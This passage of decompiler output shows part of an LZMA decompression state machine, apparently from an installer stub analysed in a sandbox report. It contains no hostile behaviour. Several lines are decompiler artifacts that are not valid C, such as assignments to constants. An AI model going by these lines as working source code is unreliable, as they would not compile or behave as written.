											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
